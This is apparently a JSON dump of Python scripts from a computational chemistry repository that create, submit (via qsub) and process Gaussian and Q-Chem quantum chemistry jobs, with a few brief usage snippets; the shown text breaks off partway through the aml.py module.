else:\n sfw('\\n')\n sfw('echo About to run {} in /net/`'.format(executable) +\n 'hostname -s`$SCRATCHDIR\\n\\n')\n sfw('{} <$INPUTFILE > $OUTPUTFILE'.format(executable))\n sfw('\\n\\n')\n if ln_running is not None:\n sfw('rm $CURRENTDIR/$WORKINGOUT')\n if chk_file is not None:\n sfw(' $CURRENTDIR/$WORKINGCHK\\n\\n')\n else:\n sfw('\\n\\n')\n sfw('cp $OUTPUTFILE $CURRENTDIR/.\\n')\n if chk_file is not None:\n sfw('cp $CHECKFILE $CURRENTDIR/.\\n\\n')\n else:\n sfw('\\n')\n sfw('echo ran in /net/`hostname -s`$SCRATCHDIR\\n')\n sfw('echo output was copied to $CURRENTDIR\\n\\n')\n\n if verbose:\n print('script written to {}'.format(_script_name))\n return _script_name\n\n\ndef 
submit_scripts(scripts, batch=False, submit=False, verbose=False):\n outputs = []\n if batch:\n if submit or input('submit all jobs? ') in yes:\n for script in scripts:\n rd, f = _dir_and_file(script)\n with cd(rd, ignore_blank=True):\n cl = ['qsub', f]\n # Don't really know how this works. Copied from\n # http://stackoverflow.com/questions/4256107/\n # running-bash-commands-in-python\n process = subprocess.Popen(cl,\n stdout=subprocess.PIPE,\n universal_newlines=True)\n output = process.communicate()[0]\n if verbose:\n print(output)\n outputs.append(output)\n else:\n if verbose:\n print('No jobs submitted, but scripts created')\n else:\n if submit or input('submit job {}? '.format(scripts[0])) in yes:\n rd, f = _dir_and_file(scripts[0])\n with cd(rd, ignore_blank=True):\n cl = ['qsub', f]\n # Don't really know how this works. Copied from\n # http://stackoverflow.com/questions/4256107/\n # running-bash-commands-in-python\n process = subprocess.Popen(cl,\n stdout=subprocess.PIPE,\n universal_newlines=True)\n output = process.communicate()[0]\n if verbose:\n print(output)\n outputs.append(output)\n else:\n if verbose:\n print('{} not submitted'.format(scripts))\n _job_info = [' '.join(output.split(' ')[2:4]) for output in outputs]\n return _job_info\n\n\nif __name__ == '__main__':\n description = 'Create and submit a script to run a Gaussian job on SCC'\n\n parser = argparse.ArgumentParser(description=description)\n parser.add_argument('in_name',\n help='Name of Gaussian input file')\n parser.add_argument('-c', '--numcores', type=int, default=16,\n help='Number of cores for job')\n # I should probably check validity of this time request\n # Maybe it doesn't matter so much because it just won't\n # submit the job and it will give quick feedback about that?\n parser.add_argument('-t', '--time',\n help='Time required as \"hh:mm:ss\"',\n default='12:00:00')\n parser.add_argument('-e', '--executable', type=str, default='g09',\n help='name of executable to run')\n parser.add_argument('-b', '--batch', action='store_true',\n help='create multiple scripts (batch job)')\n parser.add_argument('-x', '--template', default=None,\n help='template file for creating input from coords')\n parser.add_argument('-s', '--submit', action='store_true',\n help='Automatically submit jobs?')\n parser.add_argument('-v', '--verbose', action='store_true',\n help='make program more verbose')\n parser.add_argument('-j', '--nojobinfo', action='store_false',\n help='Do not return the submitted job information')\n parser.add_argument('-k', '--chk_file', default=None,\n help='checkpoint file to be written and copied back')\n parser.add_argument('--copy_chk', action='store_true',\n help='Copy check file to the scratch directory')\n parser.add_argument('-l', '--ln_running', type=str, default=None,\n help='base name for linking output to cwd while '\n 'running')\n parser.add_argument('-d', '--hold_jid', default=None,\n help='job on which this job should depend')\n args = parser.parse_args()\n\n in_name_list, args.batch = get_input_files(args.in_name, args.batch)\n if args.template:\n in_name_list = use_template(args.template, in_name_list, args.verbose)\n script_list = []\n for in_name in in_name_list:\n script_name = write_sub_script(input_name=in_name,\n num_cores=args.numcores,\n time=args.time,\n verbose=args.verbose,\n executable=args.executable,\n chk_file=args.chk_file,\n copy_chk=args.copy_chk,\n ln_running=args.ln_running,\n hold_jid=args.hold_jid)\n script_list.append(script_name)\n if not len(script_list) == 
len(in_name_list):\n # This should never be the case as far as I know, but I would\n # like to make sure everything input gets a script and all the\n # script names are there to be submitted.\n raise IOError('num scripts dif. from num names given')\n job_info = submit_scripts(script_list, args.batch, args.submit,\n args.verbose)\n if job_info and args.nojobinfo:\n for job in job_info:\n print(job)\n if args.verbose:\n print('Done. Completed normally.')\n"
},
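`write_sub_script` and `submit_scripts` can also be driven directly from Python rather than through the argparse front end at the bottom of the module. A minimal sketch; `water.com` and `water.chk` are hypothetical file names:

```python
from gautools.submit_gaussian import write_sub_script, submit_scripts

script = write_sub_script(input_name='water.com', num_cores=16,
                          time='12:00:00', executable='g16',
                          chk_file='water.chk', verbose=True)
# submit=False keeps the interactive 'submit job?' prompt in place
job_info = submit_scripts([script], batch=False, submit=False,
                          verbose=True)
print(job_info)
```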
{
"alpha_fraction": 0.5515587329864502,
"alphanum_fraction": 0.5573141574859619,
"avg_line_length": 38.339622497558594,
"blob_id": "cfcca45f68fc56d7834b0bb7e7a2d16ea73e3394",
"content_id": "03a7bed1e188ba9cea0e3338a6a78fb9170acb4c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2085,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 53,
"path": "/gautools/geomRegex.py",
"repo_name": "theavey/QM-calc-scripts",
"src_encoding": "UTF-8",
"text": "__author__ = 'Thomas Heavey'\n\nimport re\n\nfilename = \"testg.out\"\n\ndef findallgeoms(filename):\n \"\"\"A function that takes a file name and returns a list of\n geometries. Works with Gaussian output, haven't checked with\n Q-Chem.\"\"\"\n relevantelem = [1,3,4,5]\n xyzformat = '{:>2} {: f} {: f} {: f}'\n geomregex = re.compile(\n r'(?:Standard orientation)' # non-capturing (nc) start of geometry\n r'(?:.+?)' # nc geometry header\n r'((?:(?:\\s+\\d+\\s+)' # nc atom number\n r'(\\d+\\s+)' # (capturing) atomic number\n r'(?:\\d+\\s+)' # nc atomic type\n r'(-?\\d+\\.\\d+\\s*){3,3}' # 3 cartesian coordinates (x,y,z)\n r')+)' # repeat for at least one atom\n r'(?:-)' # nc end at line of dashes\n , re.DOTALL)\n\n with open(filename, 'r') as file:\n allxyz = []\n geoms = geomregex.finditer(file.read())\n for geom in geoms:\n thisxyz = []\n mlgeom = geom.group(1)\n for line in mlgeom.split('\\n'):\n # Ignore blank lines:\n if len(line) < 2:\n continue\n xyzelemstring = [line.split()[i] for i in relevantelem]\n xyzelemnum = [float(i) for i in xyzelemstring]\n xyzelemnum[0] = int(xyzelemstring[0])\n thisxyz.append(xyzformat.format(*xyzelemnum))\n allxyz.append(thisxyz)\n\n return(allxyz)\n# I don't know if I like this format. It would be reasonable for\n# Mathematica, but somewhat odd for Python. I guess for outputting\n# it though it won't be terrible because I can just double\n# iterate over the nested list, writing lines from the strings.\n# I'll need to pick a separator for between geometries maybe but that's\n# not a problem. Also with this format, should be easy to count number\n# of atoms.\n\n# Still need to have way to just find stationary points\n\nif __name__ == \"__main__\":\n print(findallgeoms(filename))\n# Ugly because returned as list of list of strings\n"
},
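As the trailing comments note, `findallgeoms` returns a list of geometries, each itself a list of formatted atom strings. Writing that back out as a concatenated XYZ file only takes a double loop; this sketch reuses the sample file name from the module:

```python
from gautools.geomRegex import findallgeoms

geoms = findallgeoms('testg.out')  # sample file name from the module
with open('testg_geoms.xyz', 'w') as f:
    for geom in geoms:
        f.write('{}\n'.format(len(geom)))     # atom-count header
        f.write('geometry from testg.out\n')  # comment line
        for atom_line in geom:
            f.write(atom_line + '\n')
```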
{
"alpha_fraction": 0.4030948877334595,
"alphanum_fraction": 0.4076610803604126,
"avg_line_length": 46.817073822021484,
"blob_id": "44bba41a231ae35baab79b2a629d2fa462b07a49",
"content_id": "a520183c4805dcffd62f5eea3d7afa72b9008a82",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3942,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 82,
"path": "/gautools/create_runs.py",
"repo_name": "theavey/QM-calc-scripts",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3.4\n\n########################################################################\n# #\n# #\n# #\n# Known issues: #\n# None #\n# #\n# . #\n# #\n# This script was written by Thomas Heavey in 2015. #\n# [email protected] [email protected] #\n# #\n# Copyright 2015 Thomas J. Heavey IV # \n# #\n# Licensed under the Apache License, Version 2.0 (the \"License\"); #\n# you may not use this file except in compliance with the License. #\n# You may obtain a copy of the License at #\n# #\n# http://www.apache.org/licenses/LICENSE-2.0 #\n# #\n# Unless required by applicable law or agreed to in writing, software #\n# distributed under the License is distributed on an \"AS IS\" BASIS, #\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or #\n# implied. #\n# See the License for the specific language governing permissions and #\n# limitations under the License. #\n# #\n########################################################################\n\n\n\n\n# This is written to work with python 3.4 because it should be good to\n# be working on the newest version of python.\n\nimport fileinput # allows easy iteration over a file\nimport sys # For importing the arguments given\nimport re # RegEx package for sorting data\nimport os.path # Allows for checking if file already exists\nimport glob # Iteration over files in directory\n\n\nbase_name = sys.argv[1]\ntemplate_file = sys.argv[2]\nin_name_list = glob.glob(base_name + '*.inp')\n\nin_name_list.sort()\nin_name_list.sort(key=len)\n\nprint('base file name is {}'.format(base_name))\nprint('number of files is {:,}'.format(len(in_name_list)))\nprint('template file name is {}'.format(template_file))\n\n\nfor in_name in in_name_list:\n job_name = in_name.replace('.inp', '')\n run_name = job_name + '.run'\n out_name = job_name + '.out'\n with open(run_name, 'w') as run_file:\n with open(template_file, 'r') as templ:\n for line in templ:\n # Note, in most places, these lines are \"stripped\" because\n # they come with leading spaces, which messes with\n # startswith and the split function, too I think.\n if line.strip().startswith('cd'):\n # make the line into a list split by slashes\n line = line.replace('ReplaceMe', base_name)\n run_file.write(line)\n continue\n if line.strip().startswith('qchem'):\n line = line.replace('ReplaceMeIn', in_name )\n line = line.replace('ReplaceMeOut', out_name)\n run_file.write(line)\n continue\n if line.strip().startswith('#PBS'):\n line = line.replace('ReplaceMe', job_name)\n run_file.write(line)\n continue\n # else:\n run_file.write(line)\n\n\n\n\n \n"
},
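The script above is run directly with two positional arguments: the base name shared by the `.inp` files and the PBS template containing the `ReplaceMe` markers. A hypothetical invocation (file names are illustrative):

```python
import subprocess

# Writes one myjob*.run file per myjob*.inp, substituting the job,
# input, and output names into the template's ReplaceMe markers.
subprocess.run(['python', 'create_runs.py', 'myjob', 'template.run'],
               check=True)
```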
{
"alpha_fraction": 0.5443902611732483,
"alphanum_fraction": 0.552195131778717,
"avg_line_length": 26.70270347595215,
"blob_id": "1a73b63636a1622afa4d7c6aa66db25715d73a7d",
"content_id": "698d26f6505cebb5bd5605ded80924b884acc4db",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1025,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 37,
"path": "/setup.py",
"repo_name": "theavey/QM-calc-scripts",
"src_encoding": "UTF-8",
"text": "from setuptools import setup\n\nsetup(\n name='gautools',\n packages=['gautools'],\n scripts=[\n 'gautools/aml.py',\n 'gautools/create_runs.py',\n 'gautools/geomRegex.py',\n 'gautools/out_to_list.py',\n 'gautools/out_to_list_sf.py',\n 'gautools/submit_gaussian.py',\n 'gautools/xtorun.py',\n 'gautools/xyz_to_inp.py',\n 'gautools/xyz_to_inpglob.py',\n ],\n url='https://github.com/theavey/QM-calc-scripts',\n license='Apache License 2.0',\n author='Thomas Heavey',\n author_email='[email protected]',\n description='A set of scripts that are useful for creating, submitting, '\n 'and processing QM calculations',\n install_requires=[\n 'MDAnalysis>=0.17.0',\n 'thtools',\n 'numpy',\n 'six',\n 'paratemp',\n 'parmed',\n ],\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Science/Research',\n 'Programming Language :: Python :: 3',\n ],\n zip_safe=True,\n)\n"
},
{
"alpha_fraction": 0.43423470854759216,
"alphanum_fraction": 0.43843528628349304,
"avg_line_length": 41.32222366333008,
"blob_id": "505e8db4756d3ef9dfb62a112ca74ed863a4b16f",
"content_id": "380110f266977ee2e70574e861bca7569ca29389",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3809,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 90,
"path": "/ConfigFileManager.py",
"repo_name": "theavey/QM-calc-scripts",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3.4\n\n########################################################################\n# #\n# #\n# #\n# Known issues: #\n# #\n# #\n# #\n# This script was written by Thomas Heavey in 2015. #\n# [email protected] [email protected] #\n# #\n# Copyright 2015 Thomas J. Heavey IV #\n# #\n# Licensed under the Apache License, Version 2.0 (the \"License\"); #\n# you may not use this file except in compliance with the License. #\n# You may obtain a copy of the License at #\n# #\n# http://www.apache.org/licenses/LICENSE-2.0 #\n# #\n# Unless required by applicable law or agreed to in writing, software #\n# distributed under the License is distributed on an \"AS IS\" BASIS, #\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or #\n# implied. #\n# See the License for the specific language governing permissions and #\n# limitations under the License. #\n# #\n########################################################################\n\n# Import Statements\nimport os # Generally good for referencing files\n\n# todo define as a class?\ndef configmanager(basename, filename=\".config\"):\n \"\"\"Function for managing a file for the current state of a\n calculation.\n .config is the file name by default\n It has a structure of keyword (whitespace) value on each line\n lines starting with # are completely ignored, but also unrecognized\n keywords are currently not interpretted as anything (I think).\"\"\"\n configexists = checkforconfig(filename)\n # todo print if one exists, and what is being done about it\n pass\n # todo Obviously need to do this\n\n\n\ndef checkforconfig(filename):\n \"\"\"Return True if one exists, False if not.\n Uses os\"\"\"\n return(os.path.isfile(filename))\n\n\n\n\ndef makenewconfig(basename, filename, **starting_values):\n \"\"\"\"\"\"\n with open(filename, 'x') as file:\n file.write('basename {}\\n'.format(basename))\n for key in starting_values:\n file.write('{} {}'.format(key, starting_values[key]))\n print(\"Wrote new configuration file to {}\".format(filename))\n\n\n\ndef readconfig(filename):\n \"\"\"\"\"\"\n filedata = dict()\n with open(filename, 'r') as file:\n for line in file:\n # take off leading and trailing whitespace\n line = line.strip()\n # ignore commented lines\n if line.startswith(\"#\"):\n continue\n # add first two parts of each line to the dictionary for\n # output as key: value pairs\n filedata.update(line.split()[0:1])\n print(\"Read configuration file {}\".format(filename))\n return(filedata)\n\n\n\n\ndef updateconfig(filename, **added_values):\n \"\"\"\"\"\"\n with open(filename, 'a') as file:\n for key in added_values:\n file.write('{} {}'.format(key, added_values[key]))\n"
},
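The intended round trip for these helpers, given the docstring's keyword-value-per-line layout, looks roughly like this (a sketch only; `configmanager` itself is still a stub, and the values shown are made up):

```python
from ConfigFileManager import (checkforconfig, makenewconfig,
                               readconfig, updateconfig)

if not checkforconfig('.config'):
    makenewconfig('myjob', '.config', state='initialized')
updateconfig('.config', step='opt1')
print(readconfig('.config'))
# e.g. {'basename': 'myjob', 'state': 'initialized', 'step': 'opt1'}
```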
{
"alpha_fraction": 0.5499294996261597,
"alphanum_fraction": 0.5562059283256531,
"avg_line_length": 37.9560432434082,
"blob_id": "4c7566f4b012cac2490aaa383988304f00dea34e",
"content_id": "2171158a476e0427ddda105b1e6561fa28f090ee",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14180,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 364,
"path": "/gautools/tools.py",
"repo_name": "theavey/QM-calc-scripts",
"src_encoding": "UTF-8",
"text": "\"\"\"\nA set of tools for working with computational chemistry files and such\n\"\"\"\n\n\n########################################################################\n# #\n# This script was written by Thomas Heavey in 2019. #\n# [email protected] [email protected] #\n# #\n# Copyright 2015-2019 Thomas J. Heavey IV #\n# #\n# Licensed under the Apache License, Version 2.0 (the \"License\"); #\n# you may not use this file except in compliance with the License. #\n# You may obtain a copy of the License at #\n# #\n# http://www.apache.org/licenses/LICENSE-2.0 #\n# #\n# Unless required by applicable law or agreed to in writing, software #\n# distributed under the License is distributed on an \"AS IS\" BASIS, #\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or #\n# implied. #\n# See the License for the specific language governing permissions and #\n# limitations under the License. #\n# #\n########################################################################\n\nimport re\nimport pathlib\nfrom six import string_types\n\nfrom .oniom import OniomUniverse\nfrom paratemp import copy_no_overwrite\n\n\ndef fix_atom_names_xyz(xyz, dry_run=False, return_list=False):\n \"\"\"\n Fix atomic symbols in xyz file\n\n VMD (sometimes?) writes XYZ files with the atomic symbols replaced with\n the atom names, which cause issues with other programs interpreting them.\n This should fix them by leaving only the first letter of each atom\n name/symbol.\n\n !! NOTE !! This is only written to work for C, H, O, N, and F currently !!\n\n :param str xyz: Name of the XYZ file to fix. It will be written to the\n same name but a backup will be made with '.bak.' added at the\n beginning of the name.\n :param bool dry_run: Default: False. If true, the output will not be\n written (but a file named 'test-temp.xyz' will be created/overwritten).\n :param bool return_list: Default: False. If True, the output will be\n written to 'test-temp.xyz' and the lines of the fixed file will be\n returned as a list of strings.\n :return: If return_list, a list of strings of the lines of the fixed XYZ\n file, otherwise None.\n :rtype: List[str] or None\n \"\"\"\n if not dry_run and not return_list:\n xyz_c = '.bak.'+xyz\n copy_no_overwrite(xyz, xyz_c)\n else:\n xyz_c = xyz\n xyz = 'test-temp.xyz'\n\n def atom_name_sub(m):\n return m.group(1) + ' '*(len(m.group(0))-1)\n lines = [] # Could make this actually not write to the temp file\n with open(xyz_c, 'r') as f_in, open(xyz, 'w') as f_out:\n for i, line in enumerate(f_in):\n if i > 1: # skip header lines\n line = re.sub(r'([CHONF])\\S*',\n atom_name_sub,\n line)\n lines += line\n if not dry_run:\n f_out.write(line)\n else:\n print(line)\n if return_list:\n return lines\n\n\ndef use_gen_template(out_file, xyz, job_name='default job name',\n checkpoint='checkpoint.chk',\n rwf='readwrite.rwf',\n nproc=16, mem=125,\n opt='opt', td=False,\n func='wb97xd', basis='6-31g(d)',\n charg_mult='0 1',\n footer='\\n\\n',\n template='/projectnb/nonadmd/theavey'\n '/qm-basics/templ-gen.txt'):\n \"\"\"\n Use general template file to write Gaussian input file\n\n :type out_file: str or TextIOBase\n :param out_file: name of file or open file object to write output to\n :type xyz: str or list\n :param xyz: List of lines from an xyz file or string of path to an xyz\n file.\n :param str job_name: Default: 'default job name'. Name of the job to put\n into the Gaussian input.\n :param str checkpoint: Default: 'checkpoint.cpt'. 
File name for the\n checkpoint file.\n :param str rwf: Default: 'readwrite.rwf'. File name for the read-write\n file.\n :type nproc: int or str\n :param nproc: Default: 16. Number of processors to tell Gaussian to use.\n Note, this now uses the newer '%cpu' syntax, and I'm not sure how\n that will work using fewer than all CPUs on the node because it says\n to use 0 to nproc-1.\n :type mem: int or str\n :param mem: Default: 125. Number of gigabytes of memory to tell Gaussian\n to use.\n :param str opt: Default: 'opt'. Opt keywords to tell Gaussian.\n If True, this will be set to 'opt'.\n If this evaluates to False, it will be set to the blank string.\n :param str td: Default: False. TD keywords to tell Gaussian.\n If True, this will be set to TD.\n If this evaluates to False, it will be set to the blank string.\n :param str func: Default: 'wb97xd'. Functional for Gaussian to use.\n :param str basis: Default: '6-31g(d)'. Basis set for Gaussian to use.\n :param str charg_mult: Default: '0 1'. Charge and multiplicity line.\n :param str footer: Default: '\\n\\n'. Footer of input file. Useful for RESP\n charge calculation jobs and such.\n :param str template: Default: '~nbth/qm-basics/templ-gen.txt'.\n The general template file to use. It should have keywords in curly\n braces with the same names as the keyword arguments to this function.\n :return: None\n \"\"\"\n if opt:\n if opt is True:\n opt = 'opt'\n else:\n opt = ''\n if td:\n if td is True:\n td = 'TD'\n else:\n td = ''\n d_fill = dict(job_name=job_name,\n checkpoint=checkpoint, rwf=rwf,\n nproc=str(int(nproc)-1), mem=str(mem),\n opt=opt, td=td,\n func=func, basis=basis,\n charg_mult=charg_mult)\n xyz_lines = _get_xyz_lines(xyz)\n own_handle = False\n if isinstance(out_file, string_types):\n own_handle = True\n out_file = open(out_file, 'x')\n try:\n with open(template, 'r') as f_templ:\n line = '' # To satisfy IDE in case of empty template\n for line in f_templ:\n line = line.format(**d_fill)\n out_file.write(line)\n if '\\n' not in line:\n out_file.write('\\n')\n for line in xyz_lines:\n out_file.write(line)\n out_file.write(footer)\n finally:\n if own_handle:\n out_file.close()\n\n\ndef make_gaussian_input(out_file, xyz, job_name='default job name',\n checkpoint='checkpoint.chk',\n rwf='readwrite.rwf',\n nproc=16, mem=125,\n route=None,\n opt='opt', td=False,\n func='wb97xd', basis='6-31g(d)',\n route_other=None,\n charg_mult='0 1',\n footer=None,\n oniom: dict = None):\n \"\"\"\n Write Gaussian input file\n\n :type out_file: str or TextIOBase\n :param out_file: name of file or open file object to write output to\n\n :type xyz: str or list\n :param xyz: List of lines from an xyz file or string of path to an xyz\n file.\n\n :param str job_name: Default: 'default job name'. Name of the job to put\n into the Gaussian input.\n\n :param str checkpoint: Default: 'checkpoint.cpt'. File name for the\n checkpoint file.\n\n :param str rwf: Default: 'readwrite.rwf'. File name for the read-write\n file.\n\n :type nproc: int or str\n :param nproc: Default: 16. Number of processors to tell Gaussian to use.\n Note, this now uses the newer '%cpu' syntax, and I'm not sure how\n that will work using fewer than all CPUs on the node because it says\n to use 0 to nproc-1.\n\n :type mem: int or str\n :param mem: Default: 125. 
Number of gigabytes of memory to tell Gaussian\n to use.\n\n :param str route: If not None, this will be the entire route section and\n the following commands will be ignored: `opt`, `td`, `func`, `basis`.\n\n :param str opt: Default: 'opt'. Opt keywords to tell Gaussian.\n If True, this will be set to 'opt'.\n If this evaluates to False, it will be set to the blank string.\n If something else, it will be set to the given string.\n\n :param str td: Default: False. TD keywords to tell Gaussian.\n If True, this will be set to TD.\n If this evaluates to False, it will be set to the blank string.\n If something else, it will be set to the given string.\n\n :param str func: Default: 'wb97xd'. Functional for Gaussian to use.\n If True or evaluates as false, it will be set to a blank string,\n which will likely be an error.\n\n :param str basis: Default: '6-31g(d)'. Basis set for Gaussian to use.\n If True or evaluates as false, it will be set to a blank string,\n which will likely be an error.\n\n :param str route_other: Other commands to use in the route section\n (e.g., 'SCRF=(solvent=dichloromethane) Int=Ultrafile freq')\n\n :param str charg_mult: Default: '0 1'. Charge and multiplicity line.\n\n :param str footer: Default: None. Footer of input file. Useful for RESP\n charge calculation jobs and such.\n\n :param dict oniom: dict to pass to :py:class:`gautools.oniom.OniomUniverse`\n constructor. The create object will then be used to make the molecule\n specification, and add the connectivity and MM parameters to the footer.\n :return: The Path to the written file\n :rtype: pathlib.Path\n \"\"\"\n link0 = _make_link0(checkpoint, rwf, str(int(nproc)-1), mem)\n route_sec = _make_route(route, opt, td, func, basis, route_other)\n if oniom is not None:\n ou = OniomUniverse(**oniom)\n xyz_lines = ou.molecule_section\n bon_sec = ''.join(ou.bonds_section)\n par_sec = ''.join(ou.params_section)\n if footer is None:\n footer_list = [bon_sec, par_sec]\n else:\n footer_list = [bon_sec, footer, par_sec]\n # This should be the right order in most cases:\n # http://gaussian.com/input/\n footer = '\\n'.join(footer_list)\n else:\n xyz_lines = _get_xyz_lines(xyz)\n if _geom_checkpoint(route_sec):\n xyz_lines = []\n own_handle = False\n if isinstance(out_file, string_types):\n own_handle = True\n out_file_path = pathlib.Path(out_file)\n out_file = open(out_file, 'x')\n else:\n out_file_path = pathlib.Path(out_file.name)\n try:\n out_file.write(link0)\n out_file.write(route_sec)\n out_file.write('\\n') # blank line between sections\n out_file.write(_make_newline_terminated(job_name))\n out_file.write('\\n') # blank line between sections\n out_file.write(_make_newline_terminated(charg_mult))\n if xyz_lines:\n line = '' # in case xyz_lines is empty (for IDE)\n for line in xyz_lines:\n out_file.write(line)\n sec_break = '\\n' if (line[-1] == '\\n') else '\\n\\n'\n out_file.write(sec_break)\n else:\n out_file.write('\\n') # blank line between sections\n if footer:\n out_file.write(_make_newline_terminated(footer))\n out_file.write('\\n') # blank line before end of file\n finally:\n if own_handle:\n out_file.close()\n return out_file_path.resolve()\n\n\n_link0_template_dict = {'nproc': '%cpu=0-{nproc}',\n 'mem': '%mem={mem}GB',\n 'rwf': '%rwf={rwf}\\n%NoSave',\n 'checkpoint': '%chk={checkpoint}'}\n\n\ndef _make_link0(checkpoint, rwf, nproc, mem):\n # http://gaussian.com/link0/\n output = []\n kwarg_dict = dict()\n # want at least rwf and checkpoint to be ordered (for %NoSave),\n # so this might not be perfect in 
Python < 3.6\n kwarg_dict['mem'] = mem\n kwarg_dict['nproc'] = nproc\n kwarg_dict['rwf'] = rwf\n kwarg_dict['checkpoint'] = checkpoint\n for key in kwarg_dict:\n if kwarg_dict[key]:\n output.append(_link0_template_dict[key].format(**kwarg_dict))\n if output:\n return _make_newline_terminated('\\n'.join(output))\n else:\n return str()\n\n\n_route_template = '# {opt} {td} {func}/{basis} {route_other}'\n\n\ndef _make_route(route, opt, td, func, basis, route_other):\n if route:\n if not route[0] == '#':\n route = '# ' + route\n return _make_newline_terminated(route)\n kwarg_dict = dict(opt=opt, td=td, func=func,\n basis=basis, route_other=route_other)\n defaults_dict = dict(\n opt='opt', td='TD',\n func='', basis='', # not sure what good defaults are here\n route_other='')\n for key in kwarg_dict:\n kwarg_dict[key] = _process_keyword(kwarg_dict[key],\n defaults_dict[key])\n return _make_newline_terminated(_route_template.format(**kwarg_dict))\n\n\ndef _process_keyword(key, key_default):\n if key:\n key = key_default if key is True else key\n else:\n key = ''\n return key\n\n\ndef _get_xyz_lines(xyz):\n if isinstance(xyz, string_types):\n xyz_lines = open(xyz, 'r').readlines()[2:]\n else:\n xyz_lines = xyz[2:]\n return xyz_lines\n\n\ndef _make_newline_terminated(line):\n if line[-1] == '\\n':\n return line\n else:\n return line + '\\n'\n\n\ndef _geom_checkpoint(route):\n match = re.search(r'geom=\\S*?checkpoint',\n route, re.IGNORECASE)\n return True if match else False\n"
},
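A brief usage sketch for the make_gaussian_input function defined in the gautools/tools.py record above. The signature, defaults, and behavior notes are taken from that source; the file names and printed message are illustrative assumptions, not part of the repository.

# Hypothetical usage of gautools.tools.make_gaussian_input; the
# keyword arguments match the source above, but 'benzene.xyz' and
# 'benzene-lvl0.com' are assumed example file names.
from gautools import tools

out_path = tools.make_gaussian_input(
    out_file='benzene-lvl0.com',  # opened with mode 'x', so it must not already exist
    xyz='benzene.xyz',            # first two lines (atom count, comment) are skipped
    job_name='benzene opt',
    checkpoint='benzene.chk',
    rwf='benzene.rwf',
    nproc=16, mem=125,            # emitted as %cpu=0-15 and %mem=125GB link0 lines
    opt='opt', td=False,
    func='wb97xd', basis='6-31g(d)',
    charg_mult='0 1',
)
print(out_path)  # resolved pathlib.Path to the written input file

Per _process_keyword in the same file, opt and td may each be True (use the default keyword), falsy (omit the keyword), or an arbitrary keyword string that is passed through to the route line.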
{
"alpha_fraction": 0.5470374226570129,
"alphanum_fraction": 0.5498037338256836,
"avg_line_length": 40.91218948364258,
"blob_id": "39e3d4dcc75ff033d0f1809bc48fca67602d6721",
"content_id": "8f3cd51de734f444ef96ec50f971016a6fc8f26b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 49163,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 1173,
"path": "/gautools/aml.py",
"repo_name": "theavey/QM-calc-scripts",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3\n\"\"\"\nRun QM calculations at multiple levels consecutively, using queuing system\n\nAutomate Multi-Level calculations\n\nThis should help with running a set of QM calculations at several levels (e.g.,\nincreasing basis set size), while intelligently using the queuing system such\nas Sun Grid Engine.\nIt can receive the signal from the queuing system that the job will be killed\nsoon and consequently submit a continuation of the job, using the\nintermediate files to speed up subsequent calculations.\n\"\"\"\n\n########################################################################\n# #\n# This script/module was written by Thomas Heavey in 2019. #\n# [email protected] [email protected] #\n# #\n# Copyright 2018-2019 Thomas J. Heavey IV #\n# #\n# Licensed under the Apache License, Version 2.0 (the \"License\"); #\n# you may not use this file except in compliance with the License. #\n# You may obtain a copy of the License at #\n# #\n# http://www.apache.org/licenses/LICENSE-2.0 #\n# #\n# Unless required by applicable law or agreed to in writing, software #\n# distributed under the License is distributed on an \"AS IS\" BASIS, #\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or #\n# implied. #\n# See the License for the specific language governing permissions and #\n# limitations under the License. #\n# #\n########################################################################\n\nimport json\nimport logging\nimport MDAnalysis as mda\nimport numpy as np\nimport os\nimport pandas as pd\nimport paratemp\nfrom paratemp.geometries import XYZ\nimport pathlib\nimport random\nimport re\nimport shutil\nimport signal\nimport subprocess\nimport sys\nimport threading\nimport thtools\nimport time\nfrom typing import List\nfrom gautools import tools\nimport functools\nimport filecmp\n\nif not sys.version_info >= (3, 6):\n raise ValueError('Python >= 3.6 is required')\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG)\n\n\ndef _setup_log(level=logging.WARNING):\n global handler\n handler = logging.StreamHandler()\n handler.setLevel(level=level)\n formatter = logging.Formatter('%(asctime)s - %(name)s - '\n '%(levelname)s - %(message)s')\n handler.setFormatter(formatter)\n log.addHandler(handler)\n\n\nobabel_module_lines = ('\\n'\n 'module load wxwidgets/3.0.2\\n'\n 'module load openbabel/2.4.1\\n')\n\nsignal_catch_lines = ('PY_PID=$!\\n'\n 'trap \"kill -n 12 $PY_PID\" usr2\\n'\n 'wait\\n\\n')\n\n\ndef log_exception(f):\n @functools.wraps(f)\n def log_exc(*args, **kwargs):\n try:\n return f(*args, **kwargs)\n except Exception:\n log.exception(f'An exception was raised in {f.__name__}!')\n raise\n\n return log_exc\n\n\nclass Calc(object):\n \"\"\"\n An object for consecutive Gaussian calculation using a queuing system\n\n Environment variables that need to be defined:\n * HOSTNAME\n * JOB_ID\n * NSLOTS\n * SGE_STDOUT_PATH\n An exception will be raised if any of these are not defined when doing\n :func:`Calc.run_calc()`.\n \"\"\"\n\n def __init__(self, status=None, base_name=None, ind=None,\n geometry=None, top=None, traj=None,\n criteria=None, react_dist=None, 